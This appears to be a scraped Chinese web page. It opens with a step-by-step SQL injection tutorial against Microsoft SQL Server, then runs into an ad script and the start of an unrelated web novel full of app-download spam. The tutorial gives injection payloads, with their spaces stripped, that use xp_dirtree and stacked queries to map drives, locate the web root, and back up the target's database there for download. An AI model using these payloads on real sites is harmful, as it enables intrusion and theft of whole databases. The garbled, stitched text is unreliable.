1、SQLSERVER允许执行多行语句;
2、该网站能进行注入;
3、没有返回详细的错误提示信息(否则没有必要用这种方法)。
根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句:
;createtabletemp(dirnvarchar(255),depthvarchar(255));--,该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树,语句如下:
;inserttemp(dir,depth)execmaster.dbo.xp_dirtree'd:';--
在进行下面的操作前,先查看D盘有几个文件夹,这样对D盘有个大致的了解,语句如下:
and(selectcount(*)fromtempwheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation','
WINDOWS','CAConfig','wmpub','MicrosoftUAM卷'))>=数字(数字=0、1、2、3...)
接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上,语句如下:
and(selectcount(*)fromtempwheredir<>'user')<(selectcount(*)fromtemp)
看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
and(selectcount(*)fromtempwheredir<>'photo')<(selectcount(*)fromtemp)
...
如果所有的测试结果都为真,表示WEB根目录很有可能在此盘上。
下面假设找到的WEB根目录在此盘上,用以下的语句来获得一级子目录的深度:
and(selectdepthfromtempwheredir='user')>=数字(数字=1、2、3...)尒説书网
假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。
目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从D盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。
接下来,另外建立一个临时表,用来存放D盘的1级子目录下的所有目录,语句如下:
;createtabletemp1(dirnvarchar(255),depthvarchar(255));--
然后把从D盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare@dirnamevarchar(255);set@dirname='d:\'+(selecttop1dirfrom(selecttop1dirfromtempwheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation'
,'WINDOWS','CAConfig','wmpub','MicrosoftUAM卷')orderbydirdesc)Torderbydir);insertintotemp1execmaster.dbo.xp_dirtree@dirname
当然也可以把D盘的第二个子目录下的所有目录存到temp1中,只需把第二个top1改为top2就行了。
现在,temp1中已经保存了所有D盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
and(selectcount(*)fromtemp1wheredir<>'user')<(selectcount(*)fromtemp1)
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。
现在假设,WEB根目录在D盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。
现在,我们用同样的方法,再建立第3个临时表:
;createtabletemp2(dirnvarchar(255),depthvarchar(255));--
然后把从D盘的website下的所有目录存到temp2中,语句如下:
declare@dirnamevarchar(255);set@dirname='d:\website\'+(selecttop1dirfrom(selecttop1dirfromtemp1wheredepth=1anddirnotin('DocumentsandSettings','ProgramFiles','RECYCLER','SystemVolumeInformation'
,'WINDOWS','CAConfig','wmpub','MicrosoftUAM卷')orderbydirdesc)Torderbydir);insertintotemp2execmaster.dbo.xp_dirtree@dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top1改为top2就行了。
现在,我们用同样的方法判断该目录是否为根目录:
and(selectcount(*)fromtemp2wheredir<>'user')<(selectcount(*)fromtemp2)
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。
用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:\website\www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。
下载完数据库后要记得把三个临时表DROP掉,现在我们在下载的数据库中可以找到所有的目录列表,包括后台管理的目录以及更多信息。
<--alimama--><Scripttype=text/JavaScript>varalimama_pid=&"mm_10000697_100588_924347&";varalimama_titlecolor=&"8AB459&";varalimama_descolor=&"333333&";varalimama_bgcolor=&"FFFFFF&";varalimama_bordercolor=&"E1E1E1&";varalimama_linkcolor=&"8AB459&";varalimama_bottomcolor=&"FFFFFF&";varalimama_anglesize=&"6&";varalimama_bgpic=&"0&";varalimama_icon=&"0&";varalimama_sizecode=&"12&";varalimama_width=468;varalimama_height=60;varalimama_type=2;</Script><Scriptsrc=&"http://a.alimama.***/inf.js&"type=text/javascript></Script><--alimama-->今天另外加一章,祝大家国庆玩得开心。 有的人死了,但没有完全死……
无尽的昏迷过后,时宇猛地从床上起身。想要看最新章节内容,请下载爱阅小说app,无广告免费阅读最新章节内容。网站已经不更新最新章节内容,已经爱阅小说APP更新最新章节内容。
他大口的呼吸起新鲜的空气,胸口一颤一颤。
迷茫、不解,各种情绪涌上心头。
这是哪?
随后,时宇下意识观察四周,然后更茫然了。
一个单人宿舍?
就算他成功得到救援,现在也应该在病房才对。
还有自己的身体……怎么会一点伤也没有。
带着疑惑,时宇的视线快速从房间扫过,最终目光停留在了床头的一面镜子上。
镜子照出他现在的模样,大约十七八岁的年龄,外貌很帅。
可问题是,这不是他!下载爱阅小说app,阅读最新章节内容无广告免费
之前的自己,是一位二十多岁气宇不凡的帅气青年,工作有段时间了。
而现在,这相貌怎么看都只是高中生的年纪……
这个变化,让时宇发愣很久。
千万别告诉他,手术很成功……
身体、面貌都变了,这根本不是手术不手术的问题了,而是仙术。
他竟完全变成了另外一个人!
难道……是自己穿越了?
除了床头那摆放位置明显风水不好的镜子,时宇还在旁边发现了三本书。
时宇拿起一看,书名瞬间让他沉默。
《新手饲养员必备育兽手册》
《宠兽产后的护理》
《异种族兽耳娘评鉴指南》
时宇:???
前两本书的名字还算正常,最后一本你是怎么回事?
“咳。”
时宇目光一肃,伸出手来,不过很快手臂一僵。
就在他想翻开第三本书,看看这究竟是个什么东西时,他的大脑猛地一阵刺痛,大量的记忆如潮水般涌现。
冰原市。
宠兽饲养基地。
实习宠兽饲养员。网站即将关闭,下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术
御兽师?
章节错误,点此报送(免注册),
报送后维护人员会在两分钟内校正章节内容,请耐心等待